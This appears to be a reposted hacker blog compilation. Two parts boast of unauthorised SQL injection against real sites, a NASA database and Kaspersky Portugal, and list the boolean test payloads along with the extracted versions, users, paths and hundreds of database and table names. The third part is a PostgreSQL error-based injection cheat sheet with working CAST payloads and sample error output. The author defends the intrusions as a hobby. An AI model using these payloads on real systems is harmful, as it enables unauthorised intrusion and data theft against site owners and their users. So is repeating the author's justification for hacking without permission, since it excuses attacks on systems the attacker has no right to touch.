SQL Error Base SQL Injection

1. NASA Full-Disclosure! AGAIN

#Important
Ok. First of all, I want to say I made this SQLi public(even though I didn’t wanted to do this), because I saw that somebody else found the vulnerable parameter.
I found this SQLi 3 months ago…
#Why I test websites ?
Because this is my hobby and I want to prove that even big websites which should be very secure, can be hacked, and this is true and sad at the same time.
I think it’s alright what i’m doing because if somebody else would find the vulnerability before me, he/she could do many bad things and damages (shelling, rooting, backdooring,etc).

The WebSite Vulnerable: http://saif-1.larc.nasa.gov/ (CEOS Systems Analysis Database)

Testing:
(True) and 1=1–

(False) and 1=2–

Informations:

#Version: 5.1.31-community
#User: root@localhost
#Principal Database: ceossadb
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Another thing, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:

Bad…

Other Databases:
#ceossadb
#information_schema
#mysql
#ceosvis

Tables from ceosvis database:
#instrument
#takes
#measurement
#contains
#mission

Tables from principal Database:
#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement

I make this public, because i see the website down , and i think the admins fix the vulnerability now because someone has reported the problem (sorry because i didn’t make this first, if was that)

2. Kaspersky Owned

In one evening, when i searched a antivirus, I entered on the official kaspersky website of Portugal from mistake.
Link: www.kaspersky.com.pt
Kaspersky, from what i know has been hacked by “unu” with MySQLi.
So I said to try to see if I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely::

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121
ERRO na execucao da query getRevendedors
ERROR: syntax error at or near "\" at character 306

pg_exec() : That means as he use a PostgreSQL database.
First time, i checked to see if is injectable, and if i can extract something.
The answer:

———————————————————–
True: and 1=1–

False: and 1=2–

———————————————————–

So I can make PostGreSQL Injection!

What I extracted?
I wasn’t concerned about the content, I only “got” the names of databases, tables and columns.

#Principal Database: dbdoc
#User: www-data
#Version: PostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

#Other Databases

1 postgres
2 template1
3 template0
4 monitoring
5 estkaspersky
6 horde
7 licence
8 hardwareipbrick
9 acessosclientes
10 licencefmota
11 temp
12 dbdoc
13 webcalendar
14 ipbox
15 adcav
16 jpleitao2
17 funambol
18 gaia
19 cinel2
20 makeupdate
21 tempdefaultconfig

#The tables from dbdoc database (number:458)

1 table_base_idxml73
2 table_ass_idxml73_idtab1025
3 liga_tipoent_categoria
4 liga_subcat_categoria
5 classif_entidades
6 ignora
7 categoria_entidade
8 site
9 subcategoria_entidade
10 tabela_gestao_ipcontactos
11 ipcontactos_lang_files
12 utilizador_externo
13 webcal_sincro
14 pga_queries
15 pga_forms
16 pga_scripts
17 pga_reports
18 pga_schema
19 pga_layout
20 avaliar
21 estadorec1
22 liga_resultado_tarefa
23 webcal_user
24 utilizadores_operacao
25 webcal_entry
26 webcal_entry_repeats
27 webcal_entry_repeats_not
28 webcal_entry_user
29 webcal_entry_ext_user
30 webcal_user_pref
31 webcal_user_layers
32 exhumationprice
33 webcal_site_extras
34 webcal_reminder_log
35 webcal_group
36 table_base_idxml13
37 webcal_group_user
38 webcal_view
39 webcal_view_user
40 gravetype
41 webcal_entry_log
42 webcal_categories
43 webcal_config
44 cemeterysection
45 solucao
46 ipdoclanguages
47 ipdoctranslation
48 ipdocsentences
49 ipdocpages
50 ipdocpagetranslation
51 table_base_idxml15
52 table_ass_idxml15_idtab51
53 lockcodigos
54 assunto
55 table_base_idxml16
56 subassunto
57 table_ass_idxml16_idtab68
58 entidades2
59 coordenadas_estado
60 dados_infantarios
61 coordenadas_estadopr
62 codigo_accaopr
63 table_base_idxml17
64 raca
65 table_base_idxml18
66 table_base_idxml19
67 table_base_idxml20
68 table_base_idxml14
69 distrito
70 concelho
...
439 accaopr
440 table_base_idxml79
441 estadopr
442 funcaoproc
443 funcaopr
444 table_ass_idxml79_idtab1183
445 table_ass_idxml79_idtab1190
446 table_ass_idxml79_idtab1191
447 table_ass_idxml79_idtab1192
448 table_ass_idxml79_idtab1193
449 table_ass_idxml77_idtab1194
450 table_base_idxml78
451 table_ass_idxml80_idtab1216
452 table_base_idxml81
453 table_ass_idxml81_idtab1228
454 table_base_idxml70
455 table_base_idxml82
456 documento
457 revisaodoc
458 table_ass_idxml82_idtab1257

#Me: Ma gandesc, daca tot este una din cele mai mari compani din lume care asigura protectia poate a multor milioane de utilizatori prin produsele sale,
de ce nu au grija de propria securitatea in primul rand? Acest lucru poate fi si din cauza firmelor care creaza aceste website-uri intr-un timp foarte scurt pe sume exagerat de mari…
Cam atat.

~Where is a will, there is a way

3. PostgreSQL Error Base Sql Injection Cheat Sheet with Example

HOWTO Ninja's PostgreSQL Error Base Sql Injection Cheat Sheet with Example

well i was playing around with postgresql lately and found some new technique to be share..

which is you may use CAST function to return result in postgresql error base sql injection
for example:

http://target.com/script.php?id=1 and 1=CAST(version() as int)

will return

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 7. 4.19" in /home/target.com/public_html/include/server/srCommon.php on line 27

and if the error return like

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: cannot cast type name to integer

u may need to concatenate your statement with some integer number
for example:

http://target.com/script.php?id=1 and 1=CAST(current_user||CHR(58)||current_database()||CHR(58)||version()||CHR(58)||123 as int)

will return for example:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: invalid input syntax for integer: "target_user:target_db:PostgreSQL 7.4.19:123"
in /home/target.com/public_html/include/server/srCommon.php on line 27

cool aite? ;-)

출처 : http://tinkode.baywords.com